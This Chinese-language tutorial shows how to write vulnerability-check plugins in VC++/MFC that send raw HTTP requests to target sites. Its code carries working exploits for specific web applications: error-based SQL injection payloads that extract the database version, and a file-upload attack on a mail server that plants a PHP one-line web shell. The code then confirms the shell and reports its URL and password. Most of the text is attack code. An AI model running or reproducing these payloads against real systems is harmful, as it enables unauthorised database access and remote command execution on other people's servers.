vc每次更新都需要重新 编译一次。好麻烦的说
首先构建一个get请求和post请求的类
void GetRequest(char *url,BOOL bRecv,BOOL bSmall)
{
//构造get请求包
CString enUrl=url;
enUrl.Replace(" ","%20");;
CString GetPackage="";
CString cookieValue="";
cookie!="" ? cookieValue ="Cookie: "+cookie+"\r\n" : cookieValue="";
GetPackage.Format("GET %s%s HTTP/1.1\r\n"
"Accept: */*\r\n"
"Accept-Language: zh-cn\r\n"
//"Accept-Encoding: gzip, deflate\r\n"
"User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\r\n"
"%s"
"Host: %s\r\n\r\n",
m_strWebRoot,enUrl,cookieValue,m_strHost.GetBuffer(0)
);
//AfxMessageBox(GetPackage);
//目录名 和 链接都有可能,所以对整个包进行编码
CString encodedPack="";
if (defaultCharset=="utf")
{
encodedPack=EncodeHanzi(GetPackage,CP_ACP,CP_UTF8);
}else{
encodedPack=EncodeHanzi(GetPackage,CP_ACP,CP_ACP);
}
//AfxMessageBox("send to target");
sendToTarget(encodedPack.GetBuffer(0),bRecv,bSmall);
}
void PostRequest(char *url, char *data,BOOL bRecv)
{
//构造Post请求包
CString enUrl=url;
enUrl.Replace(" ","%20");
// enUrl.Replace("&","$_and_$");
// enUrl=CParser::UrlEncode(enUrl);
// enUrl.Replace("$_and_$","&");
CString PostPackage="";
CString cookieValue="";
cookie!="" ? cookieValue ="Cookie: "+cookie+"\r\n" : cookieValue="";
//对可能有的中文进行编码
CString encodedUrl="",encodedData="";
if (defaultCharset=="utf8")
{
encodedUrl=EncodeHanzi(enUrl,CP_ACP,CP_UTF8);
encodedData=EncodeHanzi(data,CP_ACP,CP_UTF8);
}else{
encodedUrl=EncodeHanzi(enUrl,CP_ACP,CP_ACP);
encodedData=EncodeHanzi(data,CP_ACP,CP_ACP);
}
PostPackage.Format("POST %s%s HTTP/1.1\r\n"
"Accept: */*\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Host: %s\r\n%s"
//"Accept-Encoding: gzip, deflate\r\n"
"Content-Length: %d\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36\r\n\r\n%s",
m_strWebRoot,encodedUrl,m_strHost.GetBuffer(0),cookieValue.GetBuffer(0),encodedData.GetLength(),encodedData);
sendToTarget(PostPackage.GetBuffer(0),bRecv);
}
然后对其进行定义参数
void makePostRequest(char *url, char *data,BOOL bRecv=FALSE); //url 数据 是否接收服务器返回数据
void makeGetRequest(char *url,BOOL bRecv=FALSE,BOOL bSmall=FALSE); //url 数据 是否接收服务器返回数据
然后我们再单独调用分别对GET以及Post的请求
首先是GET请求的:漏洞来源http://0day5.com/archives/3021
GetRequest("/wap/?action=show&mod=admin%20where%20userid=1%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version(),floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23",TRUE); //发送请求以及确定要接收服务器返回的参数
//GET请求
CString strRet=getInfo("Duplicate entry '(.*?)'");
//使用正则进行匹配
if (strRet!="") //如果strRet不为空表示存在注入
{
return "/wap/?action=show&mod=admin where userid存在显错式注入! 版本"+strRet;
}
再来看一个POST请求的,漏洞详情,请关注:http://0day5.com/archives/3028
PostRequest("/delete_cart_goods.php","id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)",TRUE);
//PostRequest(url,data,ture/false)
strRet=getInfo("Duplicate entry '(.*?)'");
if (strRet!="")
{
return "/delete_cart_goods.php id存在post显错式注入! 版本"+strRet;
}
还有一个上传的方式。漏洞详情,请关注:http://0day5.com/archives/3039
它的数据包是这个样子的
POST http://mail.domain.com:889/src/big_att_upload.php HTTP/1.1 Host: mail.domain.com:889 Connection: keep-alive Content-Length: 658 Origin: http://mail.domain.com:889 User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 Content-Type: multipart/form-data; boundary=----------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Accept: */* Referer: http://mail.domain.com:889/src/write_mail.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4 Cookie: PHPSESSID=outb98m2mckt5a03pejd1aqra0; _HICOM[LANGUAGE]=zh-cn ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="Filename" vultest.php ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="PHPSESSID" outb98m2mckt5a03pejd1aqra0 ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="dir" /var/www/newmail/ ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="Filedata"; filename="vultest.php" Content-Type: application/octet-stream 12345 ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="Upload" Submit Query ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5--
我们把它分成头部还有内容两个部分
头部是这样子的
POST http://mail.domain.com:889/src/big_att_upload.php HTTP/1.1 Host: mail.domain.com:889 Connection: keep-alive Content-Length: 658 Origin: http://mail.domain.com:889 User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 Content-Type: multipart/form-data; boundary=----------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Accept: */* Referer: http://mail.domain.com:889/src/write_mail.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4 Cookie: PHPSESSID=outb98m2mckt5a03pejd1aqra0; _HICOM[LANGUAGE]=zh-cn
内容部分是这个样子的
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="Filename" vultest.php ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="PHPSESSID" outb98m2mckt5a03pejd1aqra0 ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="dir" /var/www/newmail/ ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="Filedata"; filename="vultest.php" Content-Type: application/octet-stream 12345 ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="Upload" Submit Query ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5--
然后就好办了,对其进行转码~\r\n转换为\\r\\n ""记得转为\"
CString uploadPack="",uploadHead="",uploadBody="";//首先我们定义个数据包,数据的头部和数据的内容
uploadBody="------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\nguige.php\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"PHPSESSID\"\r\n\r\noutb98m2mckt5a03pejd1aqra0\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"dir\"\r\n\r\n/var/www/newmail/\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"shell.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php @$_GET[0](@$_REQUEST[1]);?>\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"Upload\"\r\n\r\nSubmit Query\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5--";
//这里是数据的内容
uploadHead.Format("POST /src/big_att_upload.php HTTP/1.1\r\nHost: %s\r\nConnection: keep-alive\r\nContent-Length: %d\r\nOrigin: http://%s\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36\r\nContent-Type: multipart/form-data; boundary=----------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nAccept: */*\r\nReferer: http://%s/src/write_mail.php\r\nCookie: PHPSESSID=outb98m2mckt5a03pejd1aqra0; _HICOM[LANGUAGE]=zh-cn\r\n\r\n",
//数据的头部
m_strHost,uploadBody.GetLength(),m_strHost,m_strHost);
//得出数据的地址,内容,以及长度
uploadPack=uploadHead+uploadBody;
//对数据进行拼接组合起来
sendToTarget(uploadPack.GetBuffer(0),TRUE);
//发送数据
//判断一句话是否存在
makePostRequest("/shell.php?0=assert","1=echo 1;",TRUE);
if(GetResponseContent().Find("1",0)!=-1){
return "http://"+m_strHost+m_strWebRoot+"/guige.php?0=assert 密码1";
}
